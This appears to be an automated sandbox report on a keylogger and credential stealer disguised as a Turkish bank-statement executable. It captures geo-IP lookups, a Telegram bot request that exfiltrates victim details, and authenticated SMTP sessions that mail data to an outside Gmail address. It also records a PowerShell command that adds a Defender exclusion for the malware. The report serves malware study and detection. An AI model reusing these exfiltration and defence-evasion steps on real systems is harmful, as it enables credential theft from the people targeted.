                                        3192.168.2.949716188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-10-03 07:11:27 UTC680INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:27 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63281
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8P9UTNQNhSggL6FZqXcVFfmDH%2B50TzY7g78h1YDblyy5qX%2BJPOZ8js%2BYTxVqq9LA9EQTW1JkanN93Yztfs6xkp8nTxL4DcjlS4VzNuOjoESEL5m1i4%2ByKf%2F8WyznJJuIri9rmVG"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e4359841a40-EWR
                                        2024-10-03 07:11:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.949718188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:28 UTC676INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:28 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63282
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XTIqFjqEjyFZ5GbkJIEpMlh6QbbPhXtTQnuG5ZRTrlyOTYnM%2BLrqR26eyEpMo0sGE0ebUo03xHVJrJthyV%2Fj2ft2rDcZdhvOz24kU%2FsEoqPVblI1Sw22zAAjz5iIfkflFv1wDyw"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e4b1f99426b-EWR
                                        2024-10-03 07:11:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.949720188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:30 UTC682INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:30 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63284
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPPgH%2Fn89u5Z4E18lmowVVGSe4ntQM%2B70WhaHnAUcm9zmnG0QBWj8gywdtnR5KM17p%2BnXFTjzxKFP541Cx%2BboPN48rCS0zki7iST6%2BB6j7mQN%2FVF6A3MUrdxMI6ktYUPDxKnBwlr"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e567a2115cb-EWR
                                        2024-10-03 07:11:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.949722188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:31 UTC682INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:31 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63285
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GaC8N56xHYZx3rJBE6N%2B1ZKf2xACyvakDg%2F5bezwfxcTcFsWMV89pJbayfcZeIGnAG1s9%2Bk3FgBs0mRcd%2Be2j6kR5Dh%2Blh1EfksyLDT6cS2IwuAlVvQgxwgWH1OLXu%2Be4GnwDLAH"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e5e4d5f43fa-EWR
                                        2024-10-03 07:11:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.949728188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-10-03 07:11:33 UTC700INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:33 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63287
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LynhOPX9Sodb1ek5QOKsSpQhHBvvexe3qTCC1wggj1KZZdKXMKRJLreTvx3QBTidf7unLF1RclSZTQgRTs1cmN8fJNpTFPZ2Ey6nEzKNT8jeYY4109QigXSYeAS9yMmiDQUnc5vJ"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e6a6a94c42c-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-10-03 07:11:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.949731188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:36 UTC674INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:35 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63289
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afhJgd57t2CNFjg3ADkZ5J5p4qG59q%2B6esLVNNo38otAIja2hMKOAWKRqyTjnj1WWone5CCAU3YzBCOpeEX2uuOFp9AfxbCzd8G9NJRc8nVOQKEcqfjwTtWB481595yihiZplQM%2B"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e79ac501881-EWR
                                        2024-10-03 07:11:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.949732149.154.167.2204435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:36 UTC344INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Date: Thu, 03 Oct 2024 07:11:36 GMT
                                        Content-Type: application/json
                                        Content-Length: 55
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2024-10-03 07:11:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Oct 3, 2024 09:11:44.422297955 CEST5874973377.245.159.27192.168.2.9220 Win Webb - SMTP
                                        Oct 3, 2024 09:11:44.422511101 CEST49733587192.168.2.977.245.159.27EHLO 581804
                                        Oct 3, 2024 09:11:44.651324987 CEST5874973377.245.159.27192.168.2.9250-win-webb.wlsrv.com [8.46.123.33], this server offers 5 extensions
                                        250-AUTH LOGIN
                                        250-SIZE 26214400
                                        250-HELP
                                        250-AUTH=LOGIN
                                        250 STARTTLS
                                        Oct 3, 2024 09:11:44.652264118 CEST49733587192.168.2.977.245.159.27AUTH login c2F0aXNAb2JhYW1iYWxhai5jb20udHI=
                                        Oct 3, 2024 09:11:44.883759022 CEST5874973377.245.159.27192.168.2.9334 UGFzc3dvcmQ6
                                        Oct 3, 2024 09:11:45.112962008 CEST5874973377.245.159.27192.168.2.9235 Authenticated
                                        Oct 3, 2024 09:11:45.113364935 CEST49733587192.168.2.977.245.159.27MAIL FROM:<satis@obaambalaj.com.tr>
                                        Oct 3, 2024 09:11:45.481303930 CEST5874973377.245.159.27192.168.2.9250 Requested mail action okay, completed
                                        Oct 3, 2024 09:11:45.481457949 CEST49733587192.168.2.977.245.159.27RCPT TO:<dnlchns@gmail.com>
                                        Oct 3, 2024 09:11:45.713601112 CEST5874973377.245.159.27192.168.2.9250 Requested mail action okay, completed
                                        Oct 3, 2024 09:11:45.713757992 CEST49733587192.168.2.977.245.159.27DATA
                                        Oct 3, 2024 09:11:46.141494036 CEST5874973377.245.159.27192.168.2.9354 Start mail input; end with <CRLF>.<CRLF>
                                        Oct 3, 2024 09:11:46.142446041 CEST49733587192.168.2.977.245.159.27.
                                        Oct 3, 2024 09:11:46.561744928 CEST5874973377.245.159.27192.168.2.9250 Requested mail action okay, completed
                                        Oct 3, 2024 09:11:48.074827909 CEST49733587192.168.2.977.245.159.27QUIT
                                        Oct 3, 2024 09:11:48.303304911 CEST5874973377.245.159.27192.168.2.9221 Service closing transmission channel
                                        Oct 3, 2024 09:11:49.818443060 CEST5874973477.245.159.27192.168.2.9220 Win Webb - SMTP
                                        Oct 3, 2024 09:11:49.818744898 CEST49734587192.168.2.977.245.159.27EHLO 581804
                                        Oct 3, 2024 09:11:49.819036961 CEST5874973477.245.159.27192.168.2.9220 Win Webb - SMTP
                                        Oct 3, 2024 09:11:49.819428921 CEST5874973477.245.159.27192.168.2.9220 Win Webb - SMTP
                                        Oct 3, 2024 09:11:49.822271109 CEST5874973477.245.159.27192.168.2.9220 Win Webb - SMTP
                                        Oct 3, 2024 09:11:50.049725056 CEST5874973477.245.159.27192.168.2.9250-win-webb.wlsrv.com [8.46.123.33], this server offers 5 extensions
                                        250-AUTH LOGIN
                                        250-SIZE 26214400
                                        250-HELP
                                        250-AUTH=LOGIN
                                        250 STARTTLS
                                        Oct 3, 2024 09:11:50.049994946 CEST49734587192.168.2.977.245.159.27AUTH login c2F0aXNAb2JhYW1iYWxhai5jb20udHI=
                                        Oct 3, 2024 09:11:50.281033993 CEST5874973477.245.159.27192.168.2.9334 UGFzc3dvcmQ6
                                        Oct 3, 2024 09:11:50.610210896 CEST5874973477.245.159.27192.168.2.9235 Authenticated
                                        Oct 3, 2024 09:11:50.610495090 CEST49734587192.168.2.977.245.159.27MAIL FROM:<satis@obaambalaj.com.tr>
                                        Oct 3, 2024 09:11:50.844310999 CEST5874973477.245.159.27192.168.2.9250 Requested mail action okay, completed
                                        Oct 3, 2024 09:11:50.844556093 CEST49734587192.168.2.977.245.159.27RCPT TO:<dnlchns@gmail.com>
                                        Oct 3, 2024 09:11:51.082515955 CEST5874973477.245.159.27192.168.2.9250 Requested mail action okay, completed
                                        Oct 3, 2024 09:11:51.082670927 CEST49734587192.168.2.977.245.159.27DATA
                                        Oct 3, 2024 09:11:51.575171947 CEST5874973477.245.159.27192.168.2.9354 Start mail input; end with <CRLF>.<CRLF>
                                        Oct 3, 2024 09:11:51.576186895 CEST49734587192.168.2.977.245.159.27.
                                        Oct 3, 2024 09:11:52.146908045 CEST5874973477.245.159.27192.168.2.9250 Requested mail action okay, completed
                                        Oct 3, 2024 09:13:28.105871916 CEST49734587192.168.2.977.245.159.27QUIT
                                        Oct 3, 2024 09:13:28.340640068 CEST5874973477.245.159.27192.168.2.9221 Service closing transmission channel

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:03:11:16
                                        Start date:03/10/2024
                                        Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\hesaphareketi-01.exe"
                                        Imagebase:0x900000
                                        File size:884'736 bytes
                                        MD5 hash:1A2030277B88A72FEAC4F57F6514494A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:03:11:17
                                        Start date:03/10/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
                                        Imagebase:0x8f0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:03:11:17
                                        Start date:03/10/2024
                                        Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\hesaphareketi-01.exe"
                                        Imagebase:0x750000
                                        File size:884'736 bytes
                                        MD5 hash:1A2030277B88A72FEAC4F57F6514494A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:5
                                        Start time:03:11:17
                                        Start date:03/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:03:11:20
                                        Start date:03/10/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff72d8c0000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:11.1%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:3.3%
                                          Total number of Nodes:272
                                          Total number of Limit Nodes:17
                                          execution_graph 35981 2d14040 35982 2d14082 35981->35982 35984 2d14089 35981->35984 35983 2d140da CallWindowProcW 35982->35983 35982->35984 35983->35984 35979 133d6b0 DuplicateHandle 35980 133d746 35979->35980 35985 133d060 35986 133d0a6 GetCurrentProcess 35985->35986 35988 133d0f1 35986->35988 35989 133d0f8 GetCurrentThread 35986->35989 35988->35989 35990 133d135 GetCurrentProcess 35989->35990 35991 133d12e 35989->35991 35992 133d16b 35990->35992 35991->35990 35993 133d193 GetCurrentThreadId 35992->35993 35994 133d1c4 35993->35994 36094 6f69fd0 36095 6f6a01b ReadProcessMemory 36094->36095 36097 6f6a05f 36095->36097 36098 6f6ac40 36099 6f6ac46 36098->36099 36103 6f6b8f8 36099->36103 36119 6f6b8e8 36099->36119 36100 6f6ac57 36104 6f6b912 36103->36104 36113 6f6b936 36104->36113 36135 6f6c517 36104->36135 36140 6f6bd88 36104->36140 36149 6f6c0cb 36104->36149 36158 6f6c22a 36104->36158 36171 6f6bcef 36104->36171 36175 6f6bf23 36104->36175 36179 6f6be79 36104->36179 36188 6f6c11e 36104->36188 36194 6f6bf71 36104->36194 36199 6f6bdd3 36104->36199 36204 6f6c492 36104->36204 36209 6f6bdf4 